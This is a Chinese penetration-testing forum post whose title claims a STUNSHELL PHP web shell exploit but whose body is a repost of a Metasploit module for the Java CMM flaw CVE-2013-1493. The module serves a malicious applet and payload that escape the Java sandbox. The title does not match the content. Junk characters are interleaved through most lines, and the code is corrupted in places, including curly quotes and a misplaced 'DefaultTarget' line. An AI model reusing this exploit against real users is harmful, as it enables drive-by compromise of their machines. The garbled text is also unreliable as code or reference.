中国网络渗透测试联盟

标题: STUNSHELL PHP Web Shell远程执行代码 [打印本页]

---

作者: admin    时间: 2013-4-4 17:31
标题: STUNSHELL PHP Web Shell远程执行代码
##
5 }3 _! G/ c( Y; P: Z3 ^
; ]( k4 u/ J: T" f# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
% m# }' |  x" o. A4 H; S7 Z  m# web site for more information on licensing and terms of use.
, a. {, B, F4 v" P! h# http://metasploit.com/
% n; e, y1 T8 U, d##
require ‘msf/core’
require ‘rex’
+ S" l; x2 v1 ~) ~0 V% Jclass Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
0 x/ _3 ^4 j  Z. n9 |  ?include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
8 J+ A6 }. d2 {, h" P( linclude Msf::Exploit::Remote::BrowserAutopwn
. {$ W- Q+ l9 a# {; Oautopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
/ u, R8 `. j2 s4 o‘Name’ => ‘Java CMM Remote Code Execution’,
‘Description’ => %q{
8 }3 x* F* S6 E$ d* UThis module abuses the Color Management classes from a Java Applet to run
/ e  H/ Y4 k. v' k3 n9 T1 p) Varbitrary Java code outside of the sandbox as exploited in the wild in February
; U% b/ h, S; `1 {8 Eand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
8 \# y, q7 n7 _3 Zsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
! I! A5 Y2 k$ Bwarning in order to run the malicious applet.
% @8 T  {% H# X' a" X- f' p9 c},
‘License’ => MSF_LICENSE,
! \9 [5 G5 w9 Z‘Author’ =>
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
) n0 z; A* K" b% ^5 v5 y  P/ k+ K],
/ t! L2 Z- ~2 R5 Q; n' |: M: I‘References’ =>
8 e0 X# M5 J/ E& F# t7 ~[
[ 'CVE', '2013-1493' ],
& w2 r* J: p& D4 s* K" D* Z[ 'OSVDB', '90737' ],
1 t/ Y. }- @7 ~6 s4 s) l[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
' A  s) C, g- {2 m‘Platform’ => [ 'win', 'java' ],
! y: N: D+ Q3 f# `/ ]$ C( A7 W‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
& A9 Y& A4 R' {! _/ F0 T( {‘Targets’ =>
[
# O5 y! o' k# e3 M; g[ 'Generic (Java Payload)',
{
1 Y) g& R; a: y9 G: L( J/ |1 o'Platform' => 'java',
'Arch' => ARCH_JAVA
}
4 a. k* p0 O( [8 x8 ^" i, N* T  n3 t  E],
. e: _' V* D, v' F  n[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
& ?7 z$ \# Z3 T'Arch' => ARCH_X86
( A/ R3 [1 n/ U  |- Z/ E- `9 O7 G}
- w' H) |# O0 Q% Q  r/ R0 z]
9 G5 @- m" ~- f+ [8 Y" m- j3 O: M],
# N4 a3 Y6 s2 `0 e‘‘DisclosureDate’ => ‘Mar 01 2013′
# r9 A9 A9 l* S& ^  B" s))
end
def setup
! n, m' G& B% e5 F, H( Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( f+ t+ q- l* t( ~1 y" `path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
  i# h2 r, Q0 ]/ N* q! L* ^@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
2 c( C$ f, w* Apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
7 X. X% H+ |" A9 O@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% y9 o& d5 q" s8 e% O" \) ^path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha(“Init”.length)
@init_class.gsub!(“Init”, @init_class_name)
super
end
def on_request_uri(cli, request)
- i7 p) c, Y, F- k' @4 m2 s4 Vprint_status(“handling request for #{request.uri}”)
case request.uri
2 `3 m0 S2 q: y% n5 \) ^$ x, Xwhen /\.jar$/i
0 Y. w6 j8 Z, i* l' Djar = payload.encoded_jar
jar.add_file(“#{@init_class_name}.class”, @init_class)
5 Z; B2 \* W; |$ c! I, c( gjar.add_file(“Leak.class”, @leak_class)
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
jar.add_file(“MyColorSpace.class”, @color_space_class)
# V8 s+ }& o+ R, \DefaultTarget’ => 1,
metasploit_str = rand_text_alpha(“metasploit”.length)
4 I3 N4 V5 Y- V. a8 T: rpayload_str = rand_text_alpha(“payload”.length)
jar.entries.each { |entry|
entry.name.gsub!(“metasploit”, metasploit_str)
entry.name.gsub!(“Payload”, payload_str)
entry.data = entry.data.gsub(“metasploit”, metasploit_str)
entry.data = entry.data.gsub(“Payload”, payload_str)
# B& N  ~8 G# K  f. K- f}
jar.build_manifest
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
% b3 S2 I& T- y' H+ T6 U$ f; w2 |when /\/$/
payload = regenerate_payload(cli)
4 o5 S- n& U8 ?! k* H# Q* Pif not payload
print_error(“Failed to generate the payload.”)
* P) W$ N" ]4 V$ A/ X  H$ Ysend_not_found(cli)
return
* D! _$ Z0 y! ^! O* Bend
4 e3 l1 X5 X. w7 [& m. f6 Lsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
else
send_redirect(cli, get_resource() + ‘/’, ”)
end
end
8 m: V! R1 x; \2 y2 w+ |+ mdef generate_html
' M/ E9 u% q1 ?, I8 E9 Q) d) bhtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
8 g1 ]$ C' S  Z, ~6 ghtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
' N# l. d2 j9 D) X" e2 a( whtml += %Q|</applet></body></html>|
. l* c: X. d& R, ^" [4 Areturn html
- l8 _! U2 \# Z, G3 j1 n$ W' w' Bend
9 `5 x/ L" n8 _$ h5 X, Eend
end

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2